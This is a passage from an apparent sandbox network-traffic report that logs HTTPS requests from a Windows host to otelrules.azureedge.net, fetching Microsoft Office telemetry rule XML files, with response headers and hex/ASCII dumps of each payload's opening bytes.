                                                                                                        2024-12-09 12:50:14 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        97192.168.2.84982213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:14 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:14 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:14 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1405
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                        ETag: "0x8DC582BE12B5C71"
                                                                                                        x-ms-request-id: 46868609-f01e-005d-1c48-4913ba000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125014Z-r1cf579d778j4j5fhC1EWR3ge800000001xg00000000535n
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:14 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        98192.168.2.84982313.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:14 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:14 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:14 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1368
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                        ETag: "0x8DC582BDDC22447"
                                                                                                        x-ms-request-id: e2bfbc9d-f01e-0085-0f03-4888ea000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125014Z-r1cf579d7786c2tshC1EWRr1gc00000007yg0000000074qq
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:14 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        99192.168.2.84982413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:15 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:16 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:16 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1401
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                        ETag: "0x8DC582BE055B528"
                                                                                                        x-ms-request-id: 42c4dea6-f01e-0099-6c03-489171000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125016Z-r1cf579d7788pwqzhC1EWRrpd800000008mg0000000060hn
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:16 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        100192.168.2.84982513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:15 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:16 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:16 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1364
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                        ETag: "0x8DC582BE1223606"
                                                                                                        x-ms-request-id: 22946db9-b01e-0021-4e03-48cab7000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125016Z-r1cf579d7786c2tshC1EWRr1gc00000007z0000000007b7e
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:16 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        101192.168.2.84982713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:16 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:16 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:16 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1360
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                        ETag: "0x8DC582BDDEB5124"
                                                                                                        x-ms-request-id: 1dad0878-201e-0071-1606-48ff15000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125016Z-r1cf579d778xr2r4hC1EWRqvfs00000008fg0000000031af
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:16 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        102192.168.2.84982613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:16 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:16 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:16 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1397
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                        ETag: "0x8DC582BE7262739"
                                                                                                        x-ms-request-id: 7fa91f87-401e-0016-714c-4953e0000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125016Z-r1cf579d778t76vqhC1EWRdx4w0000000290000000007nx2
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:16 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        103192.168.2.84982913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:18 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:18 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:18 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1366
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                        ETag: "0x8DC582BDB779FC3"
                                                                                                        x-ms-request-id: fdf36bd3-a01e-0070-1e03-48573b000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125018Z-r1cf579d7789trgthC1EWRkkfc00000008zg000000007raq
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:18 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        104192.168.2.84982813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:18 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:18 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:18 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1403
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                        ETag: "0x8DC582BDCB4853F"
                                                                                                        x-ms-request-id: d584869f-501e-0035-440d-49c923000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125018Z-r1cf579d778mpnwnhC1EWRfgng00000002600000000033pd
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:18 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        105192.168.2.84983113.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:18 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:19 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:19 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1397
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                        ETag: "0x8DC582BDFD43C07"
                                                                                                        x-ms-request-id: 97f8358c-701e-000d-499f-496de3000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125019Z-r1cf579d778pftsbhC1EWRa0gn00000003000000000020c5
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:19 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        106192.168.2.84983013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:18 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:19 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:19 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1360
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                        ETag: "0x8DC582BDD74D2EC"
                                                                                                        x-ms-request-id: a7f22c35-701e-001e-6403-48f5e6000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125019Z-r1cf579d778z4wflhC1EWRa3h000000008gg000000001zxk
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:19 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
